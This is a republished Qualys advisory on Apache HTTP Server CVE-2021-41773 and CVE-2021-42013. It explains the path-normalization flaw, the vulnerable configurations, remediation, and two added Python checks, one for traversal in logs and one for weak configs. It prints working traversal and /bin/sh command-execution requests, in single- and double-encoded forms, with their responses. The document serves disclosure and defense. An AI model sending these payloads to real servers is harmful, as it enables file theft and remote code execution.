Apache HTTP Server Path Traversal & Remote Code Execution (CVE-2021-41773 & CVE-2021-42013) – Marketscreener.com


On October 4, 2021, the Apache HTTP Server Project released a security advisory on a path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 and 2.4.50, tracked as CVE-2021-41773 and CVE-2021-42013. In the advisory, Apache also highlighted that “the issue is known to be exploited in the wild”, and it was later identified that the vulnerability can be abused to perform remote code execution. To exploit either vulnerability, the Apache HTTP Server must be running in a non-default configuration.

Because the vulnerabilities are configuration dependent, checking the version of the Apache web server is not enough to identify vulnerable servers. With both CVEs being actively exploited, Qualys Web Application Scanning has released QIDs 150372, 150373 and 150374, which send a specially crafted HTTP request to the target server to determine whether it is exploitable. Once the vulnerability is detected, users can remediate it by upgrading to Apache HTTP Server 2.4.51 or greater.

About CVE-2021-41773

According to CVE-2021-41773, Apache HTTP Server 2.4.49 is vulnerable to path traversal and remote code execution attacks.

Path Traversal Analysis

The path traversal vulnerability was introduced by a new code change for path normalization, i.e., the logic that removes unwanted or dangerous parts from the URL path. That logic was inadequate to detect alternative encodings of the path traversal sequence “dot-dot-slash (../)”.

To prevent path traversal attacks, the normalization function responsible for resolving URL-encoded values in the requested URI resolved those encoded values one at a time. Hence, when the second dot is URL encoded as %2e, the logic fails to recognize %2e as a dot and does not decode it; the sequence ../ written as .%2e/ therefore bypasses the dot-dot check.

Along with the path traversal check bypass, for an Apache HTTP Server to be vulnerable, the server configuration must either set the directory directive for the entire server filesystem to Require all granted, or omit that directory directive from the configuration file entirely.

Vulnerable Configuration (the directory directive for the entire filesystem):

<Directory />
    Require all granted
</Directory>

Therefore, bypassing the dot-dot check with .%2e and chaining it with the misconfigured directory directive allows an attacker to read arbitrary files, such as /etc/passwd, from the vulnerable server's filesystem.

Exploitation: Path Traversal

Request:

GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 08:13:02 GMT
Server: Apache/2.4.49 (Unix)
Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT
ETag: "39e-5cceec7356000"
Accept-Ranges: bytes
Content-Length: 926
Connection: close
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Please note that the default configuration of Apache HTTP server has the entire filesystem directory directive configured as Require all denied and hence is not vulnerable.

Remote Code Execution Analysis

While CVE-2021-41773 was initially documented as a path traversal and file disclosure vulnerability, additional research concluded that it can be further exploited to achieve remote code execution when the mod_cgi module is enabled on the Apache HTTP Server: the path traversal then lets an attacker call any binary on the system using HTTP POST requests.

Configuration to enable mod_cgi module:

LoadModule cgid_module modules/mod_cgid.so

By default the mod_cgi module is disabled on the Apache HTTP Server, because the above line is commented out in the configuration file. Hence, when mod_cgi is enabled and “Require all granted” is applied to the filesystem directory directive, an attacker can remotely execute commands on the Apache server.

Exploitation: Remote Code Execution

Request:

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close
echo;id

Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 09:58:23 GMT
Server: Apache/2.4.49 (Unix)
Connection: close
Content-Length: 45
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Looking at the HTTP POST request for RCE, we can see that /bin/sh is the system binary that executes the payload echo;id and prints the output of the id command in the response.

About CVE-2021-42013

CVE-2021-42013 was introduced because the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient: it did not cover double URL encoding. The vulnerable configurations therefore remained the same, but the payload used against 2.4.49 was double URL encoded to carry out the same path traversal and remote code execution attack against 2.4.50.

The attack against 2.4.49 encoded the second dot (.) as %2e; for version 2.4.50 the same dot was double URL encoded as %%32%65.

Encoding Analysis

Conversion: dot → %2e → %%32%65

  • 2 is encoded to %32
  • e is encoded to %65
  • the original % is left as it is

Thus a dot is equivalent to %%32%65, which in turn makes ../ in double URL encoded form %%32%65%%32%65/
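To make the single-encoded bypass (the .%2e case above) and the double-encoded bypass (the %%32%65 case) concrete from the defender's side, here is an added example, not code from the Qualys post or from Apache, that shows how a detection rule should decode request paths: a check on the raw path misses both variants, a single percent-decode catches .%2e but not %%32%65, and only decoding to a fixed point catches both. The access-log lines and the 10.0.0.5 client are constructed for the demo.

```python
import re
from urllib.parse import unquote

# Constructed Apache access-log lines (not from any real server); the request
# paths mirror the single- and double-encoded forms discussed above.
SAMPLE_LOG = """\
127.0.0.1 - - [18/Oct/2021:08:13:02 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 926
127.0.0.1 - - [18/Oct/2021:10:16:51 +0000] "GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1" 200 926
127.0.0.1 - - [18/Oct/2021:10:42:40 +0000] "POST /cgi-bin/%%32%65%%32%65/bin/sh HTTP/1.1" 200 45
10.0.0.5 - - [18/Oct/2021:11:00:00 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.5 - - [18/Oct/2021:11:00:01 +0000] "GET /docs/a..b/notes.txt HTTP/1.1" 200 12
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

def decode_fully(path, max_rounds=5):
    """Percent-decode until the text stops changing: %%32%65 -> %2e -> '.'."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def has_dotdot(path):
    """True when some slash-separated segment is exactly '..' ('a..b' is not)."""
    return any(seg == ".." for seg in path.split("/"))

def raw_check(path):
    """No decoding at all: misses both .%2e and %%32%65."""
    return has_dotdot(path)

def single_decode_check(path):
    """One decoding pass: catches .%2e but still misses %%32%65."""
    return has_dotdot(unquote(path))

def full_decode_check(path):
    """Fixed-point decoding: catches both encodings."""
    return has_dotdot(decode_fully(path))

def scan_access_log(text):
    """Return (method, raw path) for every request whose decoded path traverses."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and full_decode_check(m.group("path")):
            hits.append((m.group("method"), m.group("path")))
    return hits
```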

Exploitation: Path Traversal

Request:

GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 10:16:51 GMT
Server: Apache/2.4.50 (Unix)
Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT
ETag: "39e-5cceec7356000"
Accept-Ranges: bytes
Content-Length: 926
Connection: close
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Exploitation: Remote Code Execution

Request:

POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
echo;id

Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 10:42:40 GMT
Server: Apache/2.4.50 (Unix)
Connection: close
Content-Length: 45
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Detecting the Vulnerabilities with Qualys WAS

Customers can detect these vulnerabilities with Qualys Web Application Scanning using the following QIDs:

  • 150372: Apache HTTP Server Path Traversal (CVE-2021-41773)
  • 150373: Apache HTTP Server Remote Code Execution (CVE-2021-41773)
  • 150374: Apache HTTP Server Multiple Vulnerabilities (CVE-2021-42013)

QID 150372 – Apache HTTP Server Path Traversal (CVE-2021-41773)

Report

Once the vulnerability is successfully detected by Qualys WAS, users will see results of this kind for QID 150372 in the vulnerability scan report.

Solution

Organizations using Apache HTTP Server 2.4.49 or 2.4.50 are advised to upgrade to Apache HTTP Server 2.4.51 or a later version to remediate CVE-2021-41773 and CVE-2021-42013; more information is available in the Apache security advisory.

To maintain good security practice, Qualys also advises users to ensure the following:

  • The mod_cgi module stays disabled (its default) unless the business requires it.
  • The filesystem directory directive is set to Require all denied, as shown below:

<Directory />
    Require all denied
</Directory>
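As an added configuration check, written for this page rather than taken from Qualys or the Apache project, the following audits an httpd.conf text for the two preconditions described above: a directory directive for the whole filesystem that grants access (or is missing), and an uncommented LoadModule line for mod_cgi or mod_cgid. Both configuration fragments are constructed for the demo.

```python
import re

# Constructed httpd.conf fragments for the demo: the weak configuration the
# write-up describes next to the hardened one it recommends.
WEAK_CONF = """\
LoadModule cgid_module modules/mod_cgid.so
<Directory />
    AllowOverride none
    Require all granted
</Directory>
"""

FIXED_CONF = """\
#LoadModule cgid_module modules/mod_cgid.so
<Directory />
    AllowOverride none
    Require all denied
</Directory>
"""

# <Directory /> covers the whole filesystem; a commented-out LoadModule does not count.
ROOT_DIR_RE = re.compile(r"<Directory\s+/\s*>(.*?)</Directory>", re.S | re.I)
CGI_LOAD_RE = re.compile(r"^[ \t]*LoadModule[ \t]+cgid?_module\b", re.M | re.I)

def root_directory_require(conf):
    """Return the normalized Require line inside <Directory />, or None if absent."""
    m = ROOT_DIR_RE.search(conf)
    if not m:
        return None
    for line in m.group(1).splitlines():
        words = line.split()
        if words and words[0].lower() == "require":
            return " ".join(words)
    return None

def cgi_module_loaded(conf):
    """True when an uncommented LoadModule loads cgi_module or cgid_module."""
    return bool(CGI_LOAD_RE.search(conf))

def audit(conf):
    """List which of the write-up's preconditions the configuration meets."""
    findings = []
    req = root_directory_require(conf)
    if req is None:
        findings.append("no <Directory /> block with a Require directive: filesystem access is not restricted")
    elif req.lower() == "require all granted":
        findings.append("<Directory /> uses 'Require all granted'")
    if cgi_module_loaded(conf):
        findings.append("mod_cgi/mod_cgid is loaded")
    return findings
```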

References:

Apache Security advisory:

https://httpd.apache.org/security/vulnerabilities_24.html

CVE Details:

https://nvd.nist.gov/vuln/detail/CVE-2021-41773
https://nvd.nist.gov/vuln/detail/CVE-2021-42013

Credits

Credits for the vulnerability discovery go to:

  • Ash Daulton along with the cPanel Security Team
  • Juan Escobar from Dreamlab Technologies
  • Fernando Muñoz from NULL Life CTF Team
  • Shungo Kumasaka and Nattapon Jongcharoen

Contributor

Jyoti Raval, Lead Web Application Security Analyst, Qualys

Disclaimer

Qualys Inc. published this content on 27 October 2021 and is solely responsible for the information contained therein. Distributed by Public, unedited and unaltered, on 28 October 2021 06:30:03 UTC.

Source of this news: https://www.marketscreener.com/quote/stock/QUALYS-INC-11612572/news/Apache-HTTP-Server-Path-Traversal-Remote-Code-Execution-CVE-2021-41773-CVE-2021-42013-36808414/
